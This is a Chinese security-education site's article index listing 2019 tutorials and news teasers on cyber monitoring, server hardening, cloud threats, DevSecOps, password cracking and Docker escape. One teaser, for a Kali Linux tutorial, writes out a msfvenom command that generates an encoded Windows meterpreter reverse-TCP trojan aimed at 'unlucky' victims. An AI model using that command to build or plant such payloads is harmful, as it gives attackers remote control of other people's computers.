安基网 首页 安全安全学院
订阅

安全学院

  • 基于人工智能的网络空间监测预警系统关键技术

    基于人工智能的网络空间监测预警系统关键技术
    1 引言近年来,随着网络信息技术的迅猛发展,西方军事强国提出了网络空间战略,把网络空间作为国际竞争的战略制高点和大国博弈的新战场。以美国为首的西方强国,正利用其在信息技术、信息基础设施和信息服务等方面的核心优势,积极实施“棱镜”、“主干道”、“码头”、“核子”等一系列监控项目和“爱 ...
    2019-7-1 22:13
  • 黑客、红客、白客、骇客、极客、脚本小子是什么意思?

    黑客、红客、白客、骇客、极客、脚本小子是什么意思?
    大家印象中“黑客”可能并不是一个褒义词,因为在个时代,我们互联网上有许多令人防不胜防的陷阱,让一些非计算机专业的人感觉到拥有高超计算机技术的人有一定的“危险性”。如果他们没有法律和道德的约束在社会中是个极度危险的因子。事实上,“黑客”根据不同的性质还是有许多的分类,其中一些“黑客 ...
    2019-7-1 12:41
  • 「网络安全」服务器安全加固系统

    「网络安全」服务器安全加固系统
    网络中的各种服务器,如WEB服务器、FTP服务器、E-mail服务器,是黑客攻击的重点目标,其安全性至关重要。虽然通过路由器的包过滤和防火墙的访问控制,大大增加了安全性,但是黑客还是可以利用服务器的漏洞或配置错误进行攻击,以图获取系统控制权或实现拒绝服务攻击。什么是服务器安全加固?服务器系统 ...
    2019-6-27 13:22
  • 这7本O’Reilly推出的免费网络安全电子书,够你看了

    这7本O’Reilly推出的免费网络安全电子书,够你看了
    《Cracking Security Misconceptions》随着有关组织和政府部门的安全漏洞示例越来越多,网络安全备受关注,在本书中,专业安全人员Andrew Peterson解释了几个关于黑客攻击世界的普遍误解,以便你更好的进入这个领域
    2019-6-25 12:22
  • 12个顶级云安全威胁

    12个顶级云安全威胁
    如今,越来越多的数据和应用程序正在向云端移动,这为组织带来了独特的信息安全挑战。很多组织在使用云服务时将面临12个主要的安全威胁。云计算继续改变组织使用、存储和共享数据、应用程序和工作负载的方式。它还带来了一系列新的安全威胁和挑战。随着如此多的数据进入云端,特别是进入公共云服务,这 ...
    2019-6-23 12:00
  • 安全开发你必须使用的28个DevSecOps工具

    安全开发你必须使用的28个DevSecOps工具
    将安全融入开发过程,更早捕获并修复应用漏洞,你需要这五类共28款DevSecOps工具。DevSecOps是将安全集成到整个应用开发周期的过程,是从内到外强化应用,使其能够抵御各种潜在威胁的理想方式。因为很多公司企业不断开发应用以满足客户和商业合作伙伴的需求,DevSecOps的吸引力也与日俱增。敏捷开发方 ...
    2019-6-21 13:07
  • 信息安全等级保护2.0即将来临 医院运维人员是如何看待呢

    信息安全等级保护2.0即将来临 医院运维人员是如何看待呢
    2019年后半年准备实施信息安全等级保护2.0,对等级保护2.0,对于信息机房提了不少需求,所以作为医院运维人员来说,我们也深深感受到信息安全重要性,我看了技术要求,也提出几点自己看法。在跟进传统机房建设过程中,从等级保护1.0到现在2.0来看,国家对新生大数据,云计算提了不少要 ...
    2019-6-19 11:39
  • 本期推荐18本黑客书籍!如何保护自己免受常见的黑客攻击?

    本期推荐18本黑客书籍!如何保护自己免受常见的黑客攻击?
    《Hacking》这本初学者指南着重让你了解黑客是如何工作的以及如何保护自己免受常见的黑客攻击。本书中还包含了黑客所使用的工具和技术。向你展示了如何在你的系统上发现攻击,以便尽可能减少任何潜在的损害。2、《Hacking: The Art of Exploitation》这本书可能是有史以来最好的黑 ...
    2019-6-17 15:55
  • 监狱物联网:物联网如何帮助监控囚犯

    监狱物联网:物联网如何帮助监控囚犯
    一个充满物联网的世界可能是一个非常令人毛骨悚然的地方。想象一下这样一个现实:传感器和设备可以用来全天候监控人们,跟踪人们的活动、生物特征数据,甚至人们的谈话和饮食习惯。如果有人去了不该 ...
    2019-6-14 09:04
  • 网络抗攻击说明免疫力强

    网络抗攻击说明免疫力强
    对于一家企业来说,其网络安全的防护好坏与否一定与其遭受到的攻击程度成正比,即防护可不可靠一定看遭受到的攻击狠不狠。这就像练武之前一定要学会挨揍一样,只有那些经历过各类攻击洗礼的企业网络,才最能扛打击。攻防双方并不对称当前我国整个网络安全产业的规模大概在450亿人民币左右。然而让人无 ...
    2019-6-12 10:59
  • Kali Linux学习篇:使用Metaspoit生成控制端

    Kali Linux学习篇:使用Metaspoit生成控制端
    如何使使用Metaspoit生成木马控制端?- 木马:控制端(我们)- 被控制端(倒霉蛋们)- 虚拟机的kali- 打开终端- 使用msfvenom -p命令来制作-msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '0x00' LHOST=192.168.1.108 LPORT=5555 -f exe asd.e ...
    2019-6-4 11:55
  • 八种无密码身份验证方式

    八种无密码身份验证方式
    无密码身份验证在未来几年可能将变得更为普遍。我们不妨来看看目前的发展状况。过去几个月里,微软和谷歌一直在积极推动无密码身份验证。因为在iPhone上首推指纹身份验证,苹果已成无密码身份验证主要玩家。大多数PC和Mac笔记本电脑如今都提供 Touch ID,所以一到两年之内这些东西也可以用于无密码身份 ...
    2019-6-4 11:52
  • 黑客十大工具之John the Ripper

    黑客十大工具之John the Ripper
    介绍John the Ripper 是一款常见的弱口令检测工具。本文呈现了渗透测试服务中一个细小的方面,通过使用John the ripper工具进行密码安全性测试的过程。John the ripper是一款基于字典的免费的密码破解工具。简单来说就是进行暴力密码破解,这种密码破解方式,耗费时间长、耗费处理器资源多。尝试的密码 ...
    2019-6-2 11:23
  • 干货来啦!带你初探Docker逃逸

    干货来啦!带你初探Docker逃逸
    Docker是当今使用范围最广的开源容器技术之一,具有高效易用的优点。然而如果使用Docker时采取不当安全策略,则可能导致系统面临安全威胁。本期安仔课堂,ISEC实验室的张老师将为大家介绍不同环境下,Docker逃逸至外部宿主机的情况。一、配置特权模式时的逃逸情况1.--privileged(特权模式)特权模式于 ...
    2019-6-1 09:18
  • 隐私被泄露?企业该如何维护用户权益?

    隐私被泄露?企业该如何维护用户权益?
    我们什么时候有了隐私,就是当我们有了自己的小秘密或者不想被别人知道的事情的时候。在我小的时候,隐私是什么,隐私就是爸爸妈妈偷偷看我写的日记。隐私是什么,是我稍微大了一些之后爸爸妈妈可以放心的让我睡在自己的房间里。每个人都有不想被别人知道的事情,而没有经过本人同意就擅自传播其信息就 ...
    2019-6-1 09:15
  • 最新
    热门
    返回顶部